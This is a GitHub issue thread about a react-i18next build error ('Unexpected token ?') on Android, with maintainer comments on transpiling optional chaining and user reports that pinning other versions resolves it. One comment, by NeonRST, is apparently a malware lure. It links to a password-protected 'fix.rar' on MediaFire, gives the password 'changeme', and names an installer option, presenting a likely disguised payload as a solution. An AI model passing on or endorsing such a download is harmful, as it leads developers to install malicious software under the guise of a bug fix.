### ISSUE TITLE
Error with import { initReactI18next } from "react-i18next"

### ISSUE THREAD

**Issue by jvictor98** [i18next/react-i18next#1797]
## 🐛 Bug Report

Error with import { initReactI18next } from "react-i18next";
Whenever I refer (Import {Initreacti18Next} from "React-i18Next";) The following error appears "Unexpect token '?'". .The same happens if I refer to (Import {Usetranslation} from 'React-i18Next';).
I tried everything, clean cache, node, and even started another project and this mistake does not disappear, someone Can you help me?

## To Reproduce

React Native

```js
import pt from "./pt.json";
import en from "./en.json";
import i18n from 'i18next';
import { initReactI18next } from "react-i18next";


i18n.use(initReactI18next).init({
    compatibilityJSON: 'v3',
    lng: 'en',
    resources: {
        en: en,
        pt: pt
    },
    react: {
        useSuspense: false,
    },
    interpolation: {
        escapeValue: false
    }
})

export default i18n;
```

## Expected behavior

```js
// Paste the expected results here
```

## Your Environment

- *runtime version*: node v14.20.1 and 16.18.1,
- *i18next version*: i.e. ^15.0.1",
- *os*: Windows
- *any other relevant information*:
- using in React Native, just android, mac looks ok
"react": "17.0.2",
i18next": "^23.14.0"
openjdk-11.0.14.1_1

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by anniewey** [comment]
Facing same issue, getting errors at launch. Only occur in Android, iOS was fine. 

`"react-native": "0.67.4",`
`"i18next": "^23.12.3",`
`"react-i18next": "^15.0.1",`

Same error when build via ci/cd:
```
error node_modules/react-i18next/dist/commonjs/context.js: Unexpected token: operator (?) in file node_modules/react-i18next/dist/commonjs/context.js at 56:36.
Error: Unexpected token: operator (?) in file node_modules/react-i18next/dist/commonjs/context.js at 56:36
```

**Comment by adrai** [comment]
@VIKTORVAV99 here another one ;-)

**Comment by VIKTORVAV99** [comment]
I would recommend that everyone that needs to support a specific device or set of devices do so by configuring their build tool so it transforms or transpiles the code so it's compatible with that device.

It's unreasonable to expect that packages stick with obsolete syntax when it would only affect a tiny subset of the users.

Optional chaining has been supported since Safari 13.1 for reference which was over 4 years ago and isn't even supported by Apple anymore.

**Comment by pariharkaran** [comment]
Got fixed by downgrading to v14.1.3

**Comment by adrai** [comment]
@anniewey @pariharkaran did you try v15.0.3 ?

**Comment by anniewey** [comment]
@adrai din try v15.0.3 but i managed to get past the error using `v15.0.2`

**Comment by adrai** [comment]
> @adrai din try v15.0.3 but i managed to get past the error using `v15.0.2`

@anniewey can you describe how you solved it?

**Comment by anniewey** [comment]
@adrai i only updated the version and the error disappears
